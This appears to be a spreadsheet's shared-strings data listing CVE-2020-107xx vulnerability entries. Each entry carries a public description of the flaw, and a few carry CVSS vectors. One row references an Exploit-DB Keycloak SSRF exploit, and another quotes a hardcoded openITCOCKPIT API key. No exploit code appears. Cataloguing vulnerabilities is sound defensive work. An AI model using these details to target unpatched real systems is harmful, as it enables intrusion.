  <si>
    <t>CVE-2020-10705</t>
  </si>
  <si>
    <t>A flaw was discovered in Undertow in versions before Undertow 2.1.1.Final where certain requests to the "Expect: 100-continue" header may cause an out of memory error. This flaw may potentially lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-10706</t>
  </si>
  <si>
    <t>A flaw was found in OpenShift Container Platform where OAuth tokens are not encrypted when the encryption of data at rest is enabled. This flaw allows an attacker with access to a backup to obtain OAuth tokens and then use them to log into the cluster as any user who logged into the cluster via the WebUI or via the command line in the last 24 hours. Once the backup is older than 24 hours the OAuth tokens are no longer valid.</t>
  </si>
  <si>
    <t>CVE-2020-10709</t>
  </si>
  <si>
    <t>A security flaw was found in Ansible Tower when requesting an OAuth2 token with an OAuth2 application. Ansible Tower uses the token to provide authentication. This flaw allows an attacker to obtain a refresh token that does not expire. The original token granted to the user still has access to Ansible Tower, which allows any user that can gain access to the token to be fully authenticated to Ansible Tower. This flaw affects Ansible Tower versions before 3.6.4 and Ansible Tower versions before 3.5.6.</t>
  </si>
  <si>
    <t>CVE-2020-1071</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles errors tied to Remote Access Common Dialog, aka 'Windows Remote Access Common Dialog Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10710</t>
  </si>
  <si>
    <t>A flaw was found where the Plaintext Candlepin password is disclosed while updating Red Hat Satellite through the satellite-installer. This flaw allows an attacker with sufficiently high privileges, such as root, to retrieve the Candlepin plaintext password.</t>
  </si>
  <si>
    <t>CVE-2020-10711</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the' ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference issue while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-10712</t>
  </si>
  <si>
    <t>A flaw was found in OpenShift Container Platform version 4.1 and later. Sensitive information was found to be logged by the image registry operator allowing an attacker able to gain access to those logs, to read and write to the storage backing the internal image registry. The highest threat from this vulnerability is to data integrity.</t>
  </si>
  <si>
    <t>CVE-2020-10713</t>
  </si>
  <si>
    <t>A flaw was found in grub2, prior to version 2.06. An attacker may use the GRUB 2 flaw to hijack and tamper the GRUB verification process. This flaw also allows the bypass of Secure Boot protections. In order to load an untrusted or modified kernel, an attacker would first need to establish access to the system such as gaining physical access, obtain the ability to alter a pxe-boot network, or have remote access to a networked system with root access. With this access, an attacker could then craft a string to cause a buffer overflow by injecting a malicious payload that leads to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10714</t>
  </si>
  <si>
    <t>A flaw was found in WildFly Elytron version 1.11.3.Final and before. When using WildFly Elytron FORM authentication with a session ID in the URL, an attacker could perform a session fixation attack. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10715</t>
  </si>
  <si>
    <t>A content spoofing vulnerability was found in the openshift/console 3.11 and 4.x. This flaw allows an attacker to craft a URL and inject arbitrary text onto the error page that appears to be from the OpenShift instance. This attack could potentially convince a user that the inserted text is legitimate.</t>
  </si>
  <si>
    <t>CVE-2020-10716</t>
  </si>
  <si>
    <t>A flaw was found in Red Hat Satellite's Job Invocation, where the "User Input" entry was not properly restricted to the view. This flaw allows a malicious Satellite user to scan through the Job Invocation, with the ability to search for passwords and other sensitive data. This flaw affects tfm-rubygem-foreman_ansible versions before 4.0.3.4.</t>
  </si>
  <si>
    <t>CVE-2020-10717</t>
  </si>
  <si>
    <t>A potential DoS flaw was found in the virtio-fs shared file system daemon (virtiofsd) implementation of the QEMU version &gt;= v5.0. Virtio-fs is meant to share a host file system directory with a guest via virtio-fs device. If the guest opens the maximum number of file descriptors under the shared directory, a denial of service may occur. This flaw allows a guest user/process to cause this denial of service on the host.</t>
  </si>
  <si>
    <t>CVE-2020-10718</t>
  </si>
  <si>
    <t>A flaw was found in Wildfly before wildfly-embedded-13.0.0.Final, where the embedded managed process API has an exposed setting of the Thread Context Classloader (TCCL). This setting is exposed as a public method, which can bypass the security manager. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-10719</t>
  </si>
  <si>
    <t>A flaw was found in Undertow in versions before 2.1.1.Final, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.</t>
  </si>
  <si>
    <t>CVE-2020-1072</t>
  </si>
  <si>
    <t>CVE-2020-10720</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel's implementation of GRO in versions before 5.2. This flaw allows an attacker with local access to crash the system.</t>
  </si>
  <si>
    <t>CVE-2020-10721</t>
  </si>
  <si>
    <t>A flaw was found in the fabric8-maven-plugin 4.0.0 and later. When using a wildfly-swarm or thorntail custom configuration, a malicious YAML configuration file on the local machine executing the maven plug-in could allow for deserialization of untrusted data resulting in arbitrary code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10722</t>
  </si>
  <si>
    <t>A vulnerability was found in DPDK versions 18.05 and above. A missing check for an integer overflow in vhost_user_set_log_base() could result in a smaller memory map than requested, possibly allowing memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-10723</t>
  </si>
  <si>
    <t>A memory corruption issue was found in DPDK versions 17.05 and above. This flaw is caused by an integer truncation on the index of a payload. Under certain circumstances, the index (a UInt) is copied and truncated into a uint16, which can lead to out of bound indexing and possible memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-10724</t>
  </si>
  <si>
    <t>A vulnerability was found in DPDK versions 18.11 and above. The vhost-crypto library code is missing validations for user-supplied values, potentially allowing an information leak through an out-of-bounds memory read.</t>
  </si>
  <si>
    <t>CVE-2020-10725</t>
  </si>
  <si>
    <t>A flaw was found in DPDK version 19.11 and above that allows a malicious guest to cause a segmentation fault of the vhost-user backend application running on the host, which could result in a loss of connectivity for the other guests running on that host. This is caused by a missing validity check of the descriptor address in the function `virtio_dev_rx_batch_packed()`.</t>
  </si>
  <si>
    <t>CVE-2020-10726</t>
  </si>
  <si>
    <t>A vulnerability was found in DPDK versions 19.11 and above. A malicious container that has direct access to the vhost-user socket can keep sending VHOST_USER_GET_INFLIGHT_FD messages, causing a resource leak (file descriptors and virtual memory), which may result in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-10727</t>
  </si>
  <si>
    <t>A flaw was found in ActiveMQ Artemis management API from version 2.7.0 up until 2.12.0, where a user inadvertently stores passwords in plaintext in the Artemis shadow file (etc/artemis-users.properties file) when executing the `resetUsers` operation. A local attacker can use this flaw to read the contents of the Artemis shadow file.</t>
  </si>
  <si>
    <t>CVE-2020-10728</t>
  </si>
  <si>
    <t>A flaw was found in automationbroker/apb container in versions up to and including 2.0.4-1. This container grants all users sudoer permissions allowing an unauthorized user with access to the running container the ability to escalate their own privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10729</t>
  </si>
  <si>
    <t>A flaw was found in the use of insufficiently random values in Ansible. Two random password lookups of the same length generate the equal value as the template caching action for the same file since no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.</t>
  </si>
  <si>
    <t>CVE-2020-1073</t>
  </si>
  <si>
    <t>CVE-2020-10730</t>
  </si>
  <si>
    <t>A NULL pointer dereference, or possible use-after-free flaw was found in Samba AD LDAP server in versions before 4.10.17, before 4.11.11 and before 4.12.4. Although some versions of Samba shipped with Red Hat Enterprise Linux do not support Samba in AD mode, the affected code is shipped with the libldb package. This flaw allows an authenticated user to possibly trigger a use-after-free or NULL pointer dereference. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10731</t>
  </si>
  <si>
    <t>A flaw was found in the nova_libvirt container provided by the Red Hat OpenStack Platform 16, where it does not have SELinux enabled. This flaw causes sVirt, an important isolation mechanism, to be disabled for all running virtual machines.</t>
  </si>
  <si>
    <t>CVE-2020-10732</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel's implementation of Userspace core dumps. This flaw allows an attacker with a local account to crash a trivial program and exfiltrate private kernel data.</t>
  </si>
  <si>
    <t>CVE-2020-10733</t>
  </si>
  <si>
    <t>The Windows installer for PostgreSQL 9.5 - 12 invokes system-provided executables that do not have fully-qualified paths. Executables in the directory where the installer loads or the current working directory take precedence over the intended executables. An attacker having permission to add files into one of those directories can use this to execute arbitrary code with the installer's administrative rights.</t>
  </si>
  <si>
    <t>CVE-2020-10734</t>
  </si>
  <si>
    <t>A vulnerability was found in keycloak in the way that the OIDC logout endpoint does not have CSRF protection. Versions shipped with Red Hat Fuse 7, Red Hat Single Sign-on 7, and Red Hat Openshift Application Runtimes are believed to be vulnerable.</t>
  </si>
  <si>
    <t>CVE-2020-10735</t>
  </si>
  <si>
    <t>A flaw was found in python. In algorithms with quadratic time complexity using non-binary bases, when using int("text"), a system could take 50ms to parse an int string with 100,000 digits and 5s for 1,000,000 digits (float, decimal, int.from_bytes(), and int() for binary bases 2, 4, 8, 16, and 32 are not affected). The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10736</t>
  </si>
  <si>
    <t>An authorization bypass vulnerability was found in Ceph versions 15.2.0 before 15.2.2, where the ceph-mon and ceph-mgr daemons do not properly restrict access, resulting in gaining access to unauthorized resources. This flaw allows an authenticated client to modify the configuration and possibly conduct further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-10737</t>
  </si>
  <si>
    <t>A race condition was found in the mkhomedir tool shipped with the oddjob package in versions before 0.34.5 and 0.34.6 wherein, during the home creation, mkhomedir copies the /etc/skel directory into the newly created home and changes its ownership to the home's user without properly checking the homedir path. This flaw allows an attacker to leverage this issue by creating a symlink point to a target folder, which then has its ownership transferred to the new home directory's unprivileged user.</t>
  </si>
  <si>
    <t>CVE-2020-10738</t>
  </si>
  <si>
    <t>A flaw was found in Moodle versions 3.8 before 3.8.3, 3.7 before 3.7.6, 3.6 before 3.6.10, 3.5 before 3.5.12 and earlier unsupported versions. It was possible to create a SCORM package in such a way that when added to a course, it could be interacted with via web services in order to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10739</t>
  </si>
  <si>
    <t>Istio 1.4.x before 1.4.9 and Istio 1.5.x before 1.5.4 contain the following vulnerability when telemetry v2 is enabled: by sending a specially crafted packet, an attacker could trigger a Null Pointer Exception resulting in a Denial of Service. This could be sent to the ingress gateway or a sidecar, triggering a null pointer exception which results in a denial of service. This also affects servicemesh-proxy where a null pointer exception flaw was found in servicemesh-proxy. When running Telemetry v2 (not on by default in version 1.4.x), an attacker could send a specially crafted packet to the ingress gateway or proxy sidecar, triggering a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1074</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1039.</t>
  </si>
  <si>
    <t>CVE-2020-10740</t>
  </si>
  <si>
    <t>A vulnerability was found in Wildfly in versions before 20.0.0.Final, where a remote deserialization attack is possible in the Enterprise Application Beans(EJB) due to lack of validation/filtering capabilities in wildfly.</t>
  </si>
  <si>
    <t>CVE-2020-10742</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel. An index buffer overflow during Direct IO write leading to the NFS client to crash. In some cases, a reach out of the index after one memory allocation by kmalloc will cause a kernel panic. The highest threat from this vulnerability is to data confidentiality and system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10743</t>
  </si>
  <si>
    <t>It was discovered that OpenShift Container Platform's (OCP) distribution of Kibana could open in an iframe, which made it possible to intercept and manipulate requests. This flaw allows an attacker to trick a user into performing arbitrary actions in OCP's distribution of Kibana, such as clickjacking.</t>
  </si>
  <si>
    <t>CVE-2020-10744</t>
  </si>
  <si>
    <t>An incomplete fix was found for the fix of the flaw CVE-2020-1733 ansible: insecure temporary directory when running become_user from become directive. The provided fix is insufficient to prevent the race condition on systems using ACLs and FUSE filesystems. Ansible Engine 2.7.18, 2.8.12, and 2.9.9 as well as previous versions are affected and Ansible Tower 3.4.5, 3.5.6 and 3.6.4 as well as previous versions are affected.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-10745</t>
  </si>
  <si>
    <t>A flaw was found in all Samba versions before 4.10.17, before 4.11.11 and before 4.12.4 in the way it processed NetBios over TCP/IP. This flaw allows a remote attacker could to cause the Samba server to consume excessive CPU use, resulting in a denial of service. This highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2020-10746</t>
  </si>
  <si>
    <t>A flaw was found in Infinispan (org.infinispan:infinispan-server-runtime) version 10, where it permits local access to controls via both REST and HotRod APIs. This flaw allows a user authenticated to the local machine to perform all operations on the caches, including the creation, update, deletion, and shutdown of the entire server.</t>
  </si>
  <si>
    <t>CVE-2020-10748</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak's data filter, in version 10.0.1, where it allowed the processing of data URLs in some circumstances. This flaw allows an attacker to conduct cross-site scripting or further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-10749</t>
  </si>
  <si>
    <t>A vulnerability was found in all versions of containernetworking/plugins before version 0.8.6, that allows malicious containers in Kubernetes clusters to perform man-in-the-middle (MitM) attacks. A malicious container can exploit this flaw by sending rogue IPv6 router advertisements to the host or other containers, to redirect traffic to the malicious container.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-1075</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Windows Subsystem for Linux improperly handles objects in memory, aka 'Windows Subsystem for Linux Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10750</t>
  </si>
  <si>
    <t>Sensitive information written to a log file vulnerability was found in jaegertracing/jaeger before version 1.18.1 when the Kafka data store is used. This flaw allows an attacker with access to the container's log file to discover the Kafka credentials.</t>
  </si>
  <si>
    <t>CVE-2020-10751</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernels SELinux LSM hook implementation before version 5.7, where it incorrectly assumed that an skb would only contain a single netlink message. The hook would incorrectly only validate the first netlink message in the skb and allow or deny the rest of the messages within the skb with the granted permission without further processing.</t>
  </si>
  <si>
    <t>CVE-2020-10752</t>
  </si>
  <si>
    <t>A flaw was found in the OpenShift API Server, where it failed to sufficiently protect OAuthTokens by leaking them into the logs when an API Server panic occurred. This flaw allows an attacker with the ability to cause an API Server error to read the logs, and use the leaked OAuthToken to log into the API Server with the leaked token.</t>
  </si>
  <si>
    <t>CVE-2020-10753</t>
  </si>
  <si>
    <t>A flaw was found in the Red Hat Ceph Storage RadosGW (Ceph Object Gateway). The vulnerability is related to the injection of HTTP headers via a CORS ExposeHeader tag. The newline character in the ExposeHeader tag in the CORS configuration file generates a header injection in the response when the CORS request is made. Ceph versions 3.x and 4.x are vulnerable to this issue.</t>
  </si>
  <si>
    <t>CVE-2020-10754</t>
  </si>
  <si>
    <t>It was found that nmcli, a command line interface to NetworkManager did not honour 802-1x.ca-path and 802-1x.phase2-ca-path settings, when creating a new profile. When a user connects to a network using this profile, the authentication does not happen and the connection is made insecurely.</t>
  </si>
  <si>
    <t>CVE-2020-10755</t>
  </si>
  <si>
    <t>An insecure-credentials flaw was found in all openstack-cinder versions before openstack-cinder 14.1.0, all openstack-cinder 15.x.x versions before openstack-cinder 15.2.0 and all openstack-cinder 16.x.x versions before openstack-cinder 16.1.0. When using openstack-cinder with the Dell EMC ScaleIO or VxFlex OS backend storage driver, credentials for the entire backend are exposed in the ``connection_info`` element in all Block Storage v3 Attachments API calls containing that element. This flaw enables an end-user to create a volume, make an API call to show the attachment detail information, and retrieve a username and password that may be used to connect to another user's volume. Additionally, these credentials are valid for the ScaleIO or VxFlex OS Management API, should an attacker discover the Management API endpoint. Source: OpenStack project</t>
  </si>
  <si>
    <t>CVE-2020-10756</t>
  </si>
  <si>
    <t>An out-of-bounds read vulnerability was found in the SLiRP networking implementation of the QEMU emulator. This flaw occurs in the icmp6_send_echoreply() routine while replying to an ICMP echo request, also known as ping. This flaw allows a malicious guest to leak the contents of the host memory, resulting in possible information disclosure. This flaw affects versions of libslirp before 4.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-10757</t>
  </si>
  <si>
    <t>A flaw was found in the Linux Kernel in versions after 4.5-rc1 in the way mremap handled DAX Huge Pages. This flaw allows a local attacker with access to a DAX enabled storage to escalate their privileges on the system.</t>
  </si>
  <si>
    <t>CVE-2020-10758</t>
  </si>
  <si>
    <t>A vulnerability was found in Keycloak before 11.0.1 where DoS attack is possible by sending twenty requests simultaneously to the specified keycloak server, all with a Content-Length header value that exceeds the actual byte count of the request body.</t>
  </si>
  <si>
    <t>CVE-2020-10759</t>
  </si>
  <si>
    <t>A PGP signature bypass flaw was found in fwupd (all versions), which could lead to the installation of unsigned firmware. As per upstream, a signature bypass is theoretically possible, but not practical because the Linux Vendor Firmware Service (LVFS) is either not implemented or enabled in versions of fwupd shipped with Red Hat Enterprise Linux 7 and 8. The highest threat from this vulnerability is to confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2020-1076</t>
  </si>
  <si>
    <t>CVE-2020-10760</t>
  </si>
  <si>
    <t>A use-after-free flaw was found in all samba LDAP server versions before 4.10.17, before 4.11.11, before 4.12.4 used in a AC DC configuration. A Samba LDAP user could use this flaw to crash samba.</t>
  </si>
  <si>
    <t>CVE-2020-10761</t>
  </si>
  <si>
    <t>An assertion failure issue was found in the Network Block Device(NBD) Server in all QEMU versions before QEMU 5.0.1. This flaw occurs when an nbd-client sends a spec-compliant request that is near the boundary of maximum permitted request length. A remote nbd-client could use this flaw to crash the qemu-nbd server resulting in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-10762</t>
  </si>
  <si>
    <t>An information-disclosure flaw was found in the way that gluster-block before 0.5.1 logs the output from gluster-block CLI operations. This includes recording passwords to the cmd_history.log file which is world-readable. This flaw allows local users to obtain sensitive information by reading the log file. The highest threat from this vulnerability is to data confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-10763</t>
  </si>
  <si>
    <t>An information-disclosure flaw was found in the way Heketi before 10.1.0 logs sensitive information. This flaw allows an attacker with local access to the Heketi server to read potentially sensitive information such as gluster-block passwords.</t>
  </si>
  <si>
    <t>CVE-2020-10766</t>
  </si>
  <si>
    <t>A logic bug flaw was found in Linux kernel before 5.8-rc1 in the implementation of SSBD. A bug in the logic handling allows an attacker with a local account to disable SSBD protection during a context switch when additional speculative execution mitigations are in place. This issue was introduced when the per task/process conditional STIPB switching was added on top of the existing SSBD switching. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-10767</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel before 5.8-rc1 in the implementation of the Enhanced IBPB (Indirect Branch Prediction Barrier). The IBPB mitigation will be disabled when STIBP is not available or when the Enhanced Indirect Branch Restricted Speculation (IBRS) is available. This flaw allows a local attacker to perform a Spectre V2 style attack when this configuration is active. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-10768</t>
  </si>
  <si>
    <t>A flaw was found in the Linux Kernel before 5.8-rc1 in the prctl() function, where it can be used to enable indirect branch speculation after it has been disabled. This call incorrectly reports it as being 'force disabled' when it is not and opens the system to Spectre v2 attacks. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-10769</t>
  </si>
  <si>
    <t>A buffer over-read flaw was found in RH kernel versions before 5.0 in crypto_authenc_extractkeys in crypto/authenc.c in the IPsec Cryptographic algorithm's module, authenc. When a payload longer than 4 bytes, and is not following 4-byte alignment boundary guidelines, it causes a buffer over-read threat, leading to a system crash. This flaw allows a local attacker with user privileges to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1077</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>exploits/java/webapps/50405.py</t>
  </si>
  <si>
    <t>Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)</t>
  </si>
  <si>
    <t>2021-10-13</t>
  </si>
  <si>
    <t>CVE-2020-10770</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack.</t>
  </si>
  <si>
    <t>CVE-2020-10771</t>
  </si>
  <si>
    <t>A flaw was found in Infinispan version 10, where it is possible to perform various actions that could have side effects using GET requests. This flaw allows an attacker to perform a cross-site request forgery (CSRF) attack.</t>
  </si>
  <si>
    <t>CVE-2020-10772</t>
  </si>
  <si>
    <t>An incomplete fix for CVE-2020-12662 was shipped for Unbound in Red Hat Enterprise Linux 7, as part of erratum RHSA-2020:2414. Vulnerable versions of Unbound could still amplify an incoming query into a large number of queries directed to a target, even with a lower amplification ratio compared to versions of Unbound that shipped before the mentioned erratum. This issue is about the incomplete fix for CVE-2020-12662, and it does not affect upstream versions of Unbound.</t>
  </si>
  <si>
    <t>CVE-2020-10773</t>
  </si>
  <si>
    <t>A stack information leak flaw was found in s390/s390x in the Linux kernel’s memory manager functionality, where it incorrectly writes to the /proc/sys/vm/cmm_timeout file. This flaw allows a local user to see the kernel data.</t>
  </si>
  <si>
    <t>CVE-2020-10774</t>
  </si>
  <si>
    <t>A memory disclosure flaw was found in the Linux kernel's versions before 4.18.0-193.el8 in the sysctl subsystem when reading the /proc/sys/kernel/rh_features file. This flaw allows a local user to read uninitialized values from the kernel memory. The highest threat from this vulnerability is to confidentiality.</t>
  </si>
  <si>
    <t>805</t>
  </si>
  <si>
    <t>CVE-2020-10775</t>
  </si>
  <si>
    <t>An Open redirect vulnerability was found in ovirt-engine versions 4.4 and earlier, where it allows remote attackers to redirect users to arbitrary web sites and attempt phishing attacks. Once the target has opened the malicious URL in their browser, the critical part of the URL is no longer visible. The highest threat from this vulnerability is on confidentiality.</t>
  </si>
  <si>
    <t>CVE-2020-10776</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak before version 12.0.0, where it is possible to add unsafe schemes for the redirect_uri parameter. This flaw allows an attacker to perform a Cross-site scripting attack.</t>
  </si>
  <si>
    <t>CVE-2020-10777</t>
  </si>
  <si>
    <t>A cross-site scripting flaw was found in Report Menu feature of Red Hat CloudForms 4.7 and 5. An attacker could use this flaw to execute a stored XSS attack on an application administrator using CloudForms.</t>
  </si>
  <si>
    <t>CVE-2020-10778</t>
  </si>
  <si>
    <t>In Red Hat CloudForms 4.7 and 5, the read only widgets can be edited by inspecting the forms and dropping the disabled attribute from the fields since there is no server-side validation. This business logic flaw violate the expected behavior.</t>
  </si>
  <si>
    <t>CVE-2020-10779</t>
  </si>
  <si>
    <t>Red Hat CloudForms 4.7 and 5 leads to insecure direct object references (IDOR) and functional level access control bypass due to missing privilege check. Therefore, if an attacker knows the right criteria, it is possible to access some sensitive data within the CloudForms.</t>
  </si>
  <si>
    <t>CVE-2020-1078</t>
  </si>
  <si>
    <t>CVE-2020-10780</t>
  </si>
  <si>
    <t>Red Hat CloudForms 4.7 and 5 is affected by CSV Injection flaw, a crafted payload stays dormant till a victim export as CSV and opens the file with Excel. Once the victim opens the file, the formula executes, triggering any number of possible events. While this is strictly not an flaw that affects the application directly, attackers could use the loosely validated parameters to trigger several attack possibilities.</t>
  </si>
  <si>
    <t>CVE-2020-10781</t>
  </si>
  <si>
    <t>A flaw was found in the Linux Kernel before 5.8-rc6 in the ZRAM kernel module, where a user with a local account and the ability to read the /sys/class/zram-control/hot_add file can create ZRAM device nodes in the /dev/ directory. This read allocates kernel memory and is not accounted for a user that triggers the creation of that ZRAM device. With this vulnerability, continually reading the device may consume a large amount of system memory and cause the Out-of-Memory (OOM) killer to activate and terminate random userspace processes, possibly making the system inoperable.</t>
  </si>
  <si>
    <t>CVE-2020-10782</t>
  </si>
  <si>
    <t>An exposure of sensitive information flaw was found in Ansible version 3.7.0. Sensitive information, such tokens and other secrets could be readable and exposed from the rsyslog configuration file, which has set the wrong world-readable permissions. The highest threat from this vulnerability is to confidentiality. This is fixed in Ansible version 3.7.1.</t>
  </si>
  <si>
    <t>CVE-2020-10783</t>
  </si>
  <si>
    <t>Red Hat CloudForms 4.7 and 5 is affected by a role-based privilege escalation flaw. An attacker with EVM-Operator group can perform actions restricted only to EVM-Super-administrator group, leads to, exporting or importing administrator files.</t>
  </si>
  <si>
    <t>CVE-2020-10786</t>
  </si>
  <si>
    <t>A remote command execution in Vesta Control Panel through 0.9.8-26 allows any authenticated user to execute arbitrary commands on the system via cron jobs.</t>
  </si>
  <si>
    <t>CVE-2020-10787</t>
  </si>
  <si>
    <t>An elevation of privilege in Vesta Control Panel through 0.9.8-26 allows an attacker to gain root system access from the admin account via v-change-user-password (aka the user password change script).</t>
  </si>
  <si>
    <t>CVE-2020-10788</t>
  </si>
  <si>
    <t>openITCOCKPIT before 3.7.3 uses the 1fea123e07f730f76e661bced33a94152378611e API key rather than generating a random API Key for WebSocket connections.</t>
  </si>
  <si>
    <t>CVE-2020-10789</t>
  </si>
  <si>
    <t>openITCOCKPIT before 3.7.3 has a web-based terminal that allows attackers to execute arbitrary OS commands via shell metacharacters that are mishandled on an su command line in app/Lib/SudoMessageInterface.php.</t>
  </si>
  <si>
    <t>CVE-2020-1079</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows fails to properly handle objects in memory, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1010, CVE-2020-1068.</t>
  </si>
  <si>
    <t>CVE-2020-10790</t>
  </si>
  <si>
    <t>openITCOCKPIT before 3.7.3 has unnecessary files (such as Lodash files) under the web root, which leads to XSS.</t>
  </si>
  <si>
    <t>CVE-2020-10791</t>
  </si>
  <si>
    <t>app/Plugin/GrafanaModule/Controller/GrafanaConfigurationController.php in openITCOCKPIT before 3.7.3 allows remote authenticated users to trigger outbound TCP requests (aka SSRF) via the Test Connection feature (aka testGrafanaConnection) of the Grafana Module.</t>
  </si>
  <si>
    <t>CVE-2020-10792</t>
  </si>
  <si>
    <t>openITCOCKPIT through 3.7.2 allows remote attackers to configure the self::DEVELOPMENT or self::STAGING option by placing a hostname containing "dev" or "staging" in the HTTP Host header.</t>
  </si>
  <si>
    <t>CVE-2020-10793</t>
  </si>
  <si>
    <t>CodeIgniter through 4.0.0 allows remote attackers to gain privileges via a modified Email ID to the "Select Role of the User" page. NOTE: A contributor to the CodeIgniter framework argues that the issue should not be attributed to CodeIgniter. Furthermore, the blog post reference shows an unknown website built with the CodeIgniter framework but that CodeIgniter is not responsible for introducing this issue because the framework has never provided a login screen, nor any kind of login or user management facilities beyond a Session library. Also, another reporter indicates the issue is with a custom module/plugin to CodeIgniter, not CodeIgniter itself.</t>
  </si>
  <si>
    <t>CVE-2020-10794</t>
  </si>
  <si>
    <t>Gira TKS-IP-Gateway 4.0.7.7 is vulnerable to unauthenticated path traversal that allows an attacker to download the application database. This can be combined with CVE-2020-10795 for remote root access.</t>
  </si>
  <si>
    <t>CVE-2020-10795</t>
  </si>
  <si>
    <t>Gira TKS-IP-Gateway 4.0.7.7 is vulnerable to authenticated remote code execution via the backup functionality of the web frontend. This can be combined with CVE-2020-10794 for remote root access.</t>
  </si>
  <si>
    <t>CVE-2020-10797</t>
  </si>
  <si>
    <t>An XSS vulnerability resides in the hostname field of the diag_ping.php page in pfsense before 2.4.5 version. After passing inputs to the command and executing this command, the $result variable is not sanitized before it is printed.</t>
  </si>
  <si>
    <t>CVE-2020-10799</t>
  </si>
  <si>
    <t>The svglib package through 0.9.3 for Python allows XXE attacks via an svg2rlg call.</t>
  </si>
  <si>
    <t>CVE-2020-1080</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka 'Windows Hyper-V Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1047.</t>
  </si>
  <si>
    <t>CVE-2020-10800</t>
  </si>
  <si>
    <t>lix through 15.8.7 allows man-in-the-middle attackers to execute arbitrary code by modifying the HTTP client-server data stream so that the Location header is associated with attacker-controlled executable content in the postDownload field.</t>
  </si>
  <si>
    <t>CVE-2020-10802</t>
  </si>
  <si>
    <t>In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability has been discovered where certain parameters are not properly escaped when generating certain queries for search actions in libraries/classes/Controllers/Table/TableSearchController.php. An attacker can generate a crafted database or table name. The attack can be performed if a user attempts certain search operations on the malicious database or table.</t>
  </si>
  <si>
    <t>CVE-2020-10803</t>
  </si>
  <si>
